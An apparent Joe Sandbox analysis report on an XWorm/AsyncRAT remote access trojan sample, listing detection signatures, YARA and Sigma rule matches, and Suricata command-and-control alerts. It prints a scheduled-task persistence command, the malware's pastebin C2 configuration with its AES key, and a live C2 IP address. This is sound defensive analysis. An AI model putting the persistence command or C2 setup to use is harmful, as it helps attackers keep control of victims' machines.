Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XClient.exe

Overview

General Information

Sample name:XClient.exe
Analysis ID:1583745
MD5:2e525ccebf9ede7492931251eb66571a
SHA1:a0598bffa349759fb3dcf130cf93ed41a3c3d8f4
SHA256:fdefedd8f02446dd47723f4b1829f685f64e76b9d29002545dd4c5d5257eae29
Tags:AsyncRATexemalwaretrojanuser-Joker
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XClient.exe (PID: 6884 cmdline: "C:\Users\user\Desktop\XClient.exe" MD5: 2E525CCEBF9EDE7492931251EB66571A)
    • schtasks.exe (PID: 5968 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 2132 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • XClient.exe (PID: 5180 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • XClient.exe (PID: 3592 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • XClient.exe (PID: 6496 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: 2E525CCEBF9EDE7492931251EB66571A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/c8qJf1m5"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
    XClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x7211:$str01: $VB$Local_Port
    • 0x7202:$str02: $VB$Local_Host
    • 0x7445:$str03: get_Jpeg
    • 0x6f03:$str04: get_ServicePack
    • 0x8250:$str05: Select * from AntivirusProduct
    • 0x844c:$str06: PCRestart
    • 0x8460:$str07: shutdown.exe /f /r /t 0
    • 0x8512:$str08: StopReport
    • 0x84e8:$str09: StopDDos
    • 0x85de:$str10: sendPlugin
    • 0x877c:$str12: -ExecutionPolicy Bypass -File "
    • 0x88a1:$str13: Content-length: 5235
    XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x8c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x87bc:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\XClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0x7211:$str01: $VB$Local_Port
      • 0x7202:$str02: $VB$Local_Host
      • 0x7445:$str03: get_Jpeg
      • 0x6f03:$str04: get_ServicePack
      • 0x8250:$str05: Select * from AntivirusProduct
      • 0x844c:$str06: PCRestart
      • 0x8460:$str07: shutdown.exe /f /r /t 0
      • 0x8512:$str08: StopReport
      • 0x84e8:$str09: StopDDos
      • 0x85de:$str10: sendPlugin
      • 0x877c:$str12: -ExecutionPolicy Bypass -File "
      • 0x88a1:$str13: Content-length: 5235
      C:\Users\user\AppData\Roaming\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x87bc:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x8a60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8afd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8c12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x85bc:$cnc4: POST / HTTP/1.1
        00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Process Memory Space: XClient.exe PID: 6884JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.XClient.exe.210000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.XClient.exe.210000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
              • 0x7211:$str01: $VB$Local_Port
              • 0x7202:$str02: $VB$Local_Host
              • 0x7445:$str03: get_Jpeg
              • 0x6f03:$str04: get_ServicePack
              • 0x8250:$str05: Select * from AntivirusProduct
              • 0x844c:$str06: PCRestart
              • 0x8460:$str07: shutdown.exe /f /r /t 0
              • 0x8512:$str08: StopReport
              • 0x84e8:$str09: StopDDos
              • 0x85de:$str10: sendPlugin
              • 0x877c:$str12: -ExecutionPolicy Bypass -File "
              • 0x88a1:$str13: Content-length: 5235
              0.0.XClient.exe.210000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x87bc:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\XClient.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\XClient.exe", ParentImage: C:\Users\user\Desktop\XClient.exe, ParentProcessId: 6884, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", ProcessId: 5968, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:07:19.356985+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:26.053811+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:32.199336+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:45.057721+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:55.943481+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:57.899617+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:07.931512+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:08.429735+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:18.960693+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:19.225076+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:19.225960+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:19.312128+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:19.358606+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:19.477694+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:25.839737+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:25.963366+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:29.322721+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:29.409395+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:29.503593+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:29.597019+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:34.622947+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:34.716125+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:34.809161+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:34.894946+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:34.989565+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:35.084120+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:47.867467+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:48.601585+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:49.289059+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:50.461112+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:50.551238+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:50.644750+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:50.723432+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:53.336467+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:54.930018+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:55.851922+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:55.981477+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:58.211406+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:01.136759+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:06.476691+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:11.325602+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:13.336525+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:13.436101+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:20.229781+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:21.476571+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:21.576018+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:25.399402+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:25.944410+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:27.337864+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:27.338032+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:37.382583+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:37.699959+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:38.299166+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:47.195629+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:47.555250+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:52.648936+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:52.944630+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:55.941742+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:02.589170+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:03.048695+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:03.141843+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:13.195539+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:13.322235+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:13.415532+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:22.664732+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:24.610608+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:25.942800+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:34.711534+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:34.809849+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:34.903054+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:34.995921+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:35.088920+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:45.120046+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:45.213398+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:45.310161+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:45.403174+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:50.826218+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:50.920411+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:51.013312+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:51.106485+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:55.246273+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:55.942781+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:56.325098+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:59.308022+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:11:00.870752+010028528701Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:07:19.383879+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:07:32.200994+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:07:45.119776+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:07:57.900946+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:07.937369+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:08.431252+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:18.962533+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:19.314165+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:19.361315+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:19.479640+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:25.847864+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:29.328176+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:29.411984+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:29.505485+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:29.603256+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:34.624385+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:34.717433+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:34.810988+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:34.896488+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:34.991018+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:35.085619+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:35.178907+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:35.184981+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:47.869276+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:48.602944+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:49.297369+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.464486+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.552997+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.646220+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.725396+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.802939+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.897646+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.902763+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:50.995663+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:51.007122+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:51.088767+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:51.093644+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:53.342240+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:54.931644+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:55.858233+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:08:58.258236+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:01.138062+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:01.225686+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:01.322255+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:06.478780+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:11.330253+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:13.344413+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:13.440256+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:20.233278+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:21.484371+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:21.580271+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:25.403642+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:27.339604+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:27.344416+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:37.388404+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:37.704422+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:38.304303+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:47.197312+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:47.558589+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:52.650949+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:52.946369+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:53.039248+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:53.044482+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:09:53.263432+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:02.591056+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:03.050258+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:03.143437+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:13.203880+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:13.323976+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:13.417056+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:22.666304+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:24.612694+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:34.713528+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:34.811492+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:34.904303+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:34.997326+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:35.091153+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:45.121619+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:45.218478+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:45.311654+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:45.405751+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:50.828802+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:50.921759+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:51.015010+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:51.107738+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:55.248291+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:10:59.337165+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              2025-01-03T14:11:00.871460+010028529231Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
